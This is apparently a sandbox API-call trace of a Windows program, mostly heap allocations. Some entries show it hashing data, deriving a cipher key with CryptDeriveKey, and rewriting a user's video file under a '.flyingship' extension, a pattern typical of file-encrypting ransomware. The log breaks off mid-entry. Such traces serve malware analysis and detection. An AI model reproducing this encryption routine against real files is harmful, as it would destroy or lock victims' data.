RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8df140 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0194.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0194.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0194.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x9bd990 [0194.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd990, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0194.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.509] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0194.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0194.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0194.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0194.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.510] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0194.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0194.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0194.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.513] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0194.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0194.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0194.514] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0194.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0194.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.515] CryptDestroyHash (hHash=0x90af58) returned 1 [0194.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\-4jytdy7dtgq 7n_rha.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.516] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.516] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0194.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0194.517] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\-4jytdy7dtgq 7n_rha.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0194.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.519] PeekMessageW (in: 